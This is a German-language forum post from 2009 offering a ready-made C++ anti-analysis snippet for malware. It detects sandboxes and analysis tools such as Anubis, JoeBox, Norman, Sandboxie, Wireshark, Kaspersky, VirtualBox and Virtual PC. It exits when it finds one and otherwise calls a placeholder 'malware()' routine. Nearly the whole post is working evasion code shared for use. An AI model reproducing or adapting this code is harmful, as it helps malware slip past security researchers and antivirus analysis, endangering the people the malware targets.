Joa, biete hier eine simples Snippet für euch an, dass ich vor nen paar Wochen geschrieben hatte.
Es unterstützt einige Sandboxies/Emus, wie Anubis, Threat Expert, Sandbox, JoeBox, Norman, WireShark, Kaspersky, iDEFENSE sysAnalyzer, Sunbelt, Sandboxie, Virtual PC, Virtual Box und andere.
Code:#include <iostream> #include <string> #include <Windows.h> #include <tlhelp32.h> #include <TCHAR.H> #include <dir.h> using namespace std; int detected = 0; DWORD GetModulePath(HINSTANCE hInst,LPTSTR pszBuffer,DWORD dwSize) { DWORD dwLength = GetModuleFileName(hInst,pszBuffer,dwSize); if(dwLength) { while(dwLength && pszBuffer[ dwLength ] != _T('\\')) { dwLength--; } if(dwLength) { pszBuffer[ dwLength + 1 ] = _T('\000'); } } return dwLength; } BOOL IsProcessRunning(const string szExeName) { PROCESSENTRY32 pce = {sizeof(PROCESSENTRY32)}; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0); if(Process32First(hSnapshot, &pce)) { do { if(!strcmp((const char*)pce.szExeFile, (const char*)szExeName.c_str())) { return 1; } }while( Process32Next(hSnapshot, &pce) ); } return 0; } BOOL IsUsername(const string comp) { char username[30]; DWORD nSize; nSize = sizeof(username); GetUserName(username, &nSize); if(strcmp(username,comp.c_str()) == 0) { return 1; } return 0; } BOOL IsFileInFolder(const char* filefold) { char buff[255]; GetModuleFileName(0,buff,255); if (strstr(buff, filefold)) { return 1; } return 0; } BOOL IsFolderExist(const string comp) { if(chdir(comp.c_str()) == 0) { return 1; } return 0; } BOOL IsAnubis() { if (IsFileInFolder("C:\\InsideTm\\") == 1) { detected = 1; return 1; } return 0; } BOOL IsTE() { if(IsUsername("username") == 1) { detected = 1; return 1; } return 0; } BOOL IsSandbox() { if(IsUsername("user") == 1) { detected = 1; return 1; } return 0; } BOOL IsJB() { if(IsProcessRunning("joeboxserver.exe") == 1 || IsProcessRunning("joeboxcontrol.exe") == 1) { detected = 1; return 1; } return 0; } BOOL IsNorman() { if(IsUsername("currentuser") == 1) { detected = 1; return 1; } return 0; } BOOL IsWireShark() { if(IsProcessRunning("wireshark.exe") == 1) { detected = 1; return 1; } return 0; } BOOL IsKaspersky() { if(IsProcessRunning("avp.exe") == 1) { detected = 1; return 1; } return 0; } BOOL IsID() //Sunbelt & Sandboxie included { if(GetModuleHandle("api_log.dll") || GetModuleHandle("dir_watch.dll")) { detected = 1; return 1; } else if(IsProcessRunning("sniff_hit.exe") == 1 || IsProcessRunning("sysAnalyzer.exe") == 1) { detected = 1; return 1; } return 0; } BOOL IsSunbelt() { if(GetModuleHandle("pstorec.dll")) { detected = 1; return 1; } else if(IsFolderExist("C:\\analysis") == 1) { detected = 1; return 1; } return 0; } BOOL IsSandboxie() { if(GetModuleHandle("SbieDll.dll")) { detected = 1; return 1; } return 0; } BOOL IsVPC() //steve10120 { HMODULE dll = LoadLibrary("C:\\vmcheck.dll"); if(dll == NULL) { return 0; } BOOL (WINAPI *fnIsRunningInsideVirtualMachine)() = (BOOL (WINAPI *)()) GetProcAddress(dll, "IsRunningInsideVirtualMachine"); BOOL retValue = FALSE; if(fnIsRunningInsideVirtualMachine != NULL) { retValue = fnIsRunningInsideVirtualMachine(); FreeLibrary(dll); detected = 1; return 1; } FreeLibrary(dll); return 0; } BOOL IsOther() //carb0n { unsigned char bBuffer; unsigned long aCreateProcess = (unsigned long)GetProcAddress( GetModuleHandle( "KERNEL32.dll" ), "CreateProcessA" ); ReadProcessMemory( GetCurrentProcess( ), (void *) aCreateProcess, &bBuffer, 1, 0 ); if( bBuffer == 0xE9 ) { detected = 1; return 1; } return 0; } BOOL IsEmu() //Noble & ChainCoder { DWORD countit, countit2; countit = GetTickCount(); Sleep(500); countit2 = GetTickCount(); if ((countit2 - countit) < 500) { detected = 1; return 1; } return 0; } BOOL IsVB() { if(IsProcessRunning("VBoxService.exe") == 1) { detected = 1; return 1; } return 0; } BOOL malware() { //some malware code cout << "MALWARE" << endl; return 0; } BOOL IsAll() { if(IsAnubis() == 1) { cout << "Anubis detected..." << endl; } else if(IsTE() == 1) { cout << "Threat Expert detected..." << endl; } else if(IsSandbox() == 1) { cout << "Sandbox detected..." << endl; } else if(IsJB() == 1) { cout << "JoeBox detected..." << endl; } else if(IsNorman() == 1) { cout << "Norman detected" << endl; } else if(IsWireShark() == 1) { cout << "WireShark detected" << endl; } else if(IsKaspersky() == 1) { cout << "Kaspersky detected" << endl; } else if(IsID() == 1) { cout << "iDEFENSE sysAnalyzer detected" << endl; } else if(IsSunbelt() == 1) { cout << "Sunbelt detected" << endl; } else if(IsSandboxie() == 1) { cout << "Sandboxie detected" << endl; } else if(IsVPC() == 1) { cout << "Virtual PC detected" << endl; } else if(IsVB() == 1) { cout << "Virtual Box detected" << endl; } else if(IsOther() == 1 || IsEmu() == 1) { cout << "Some others detected" << endl; } if(detected != 0) { cout << "Detected some Emulators/sandboxs, exiting...\a" << endl; return 1; } cout << "Nothing found, executing malware..." << endl; malware(); return 0; } int main() { IsAll(); system("PAUSE"); return 0; }
Ergebnis 1 bis 9 von 9
Baum-Darstellung
-
27.04.2009, 13:53 #1W32.Lovgate
- Registriert seit
- 09.06.2007
- Beiträge
- 339
[C++] Anti Anubis, Threat Expert, Norman etc.
Zitieren
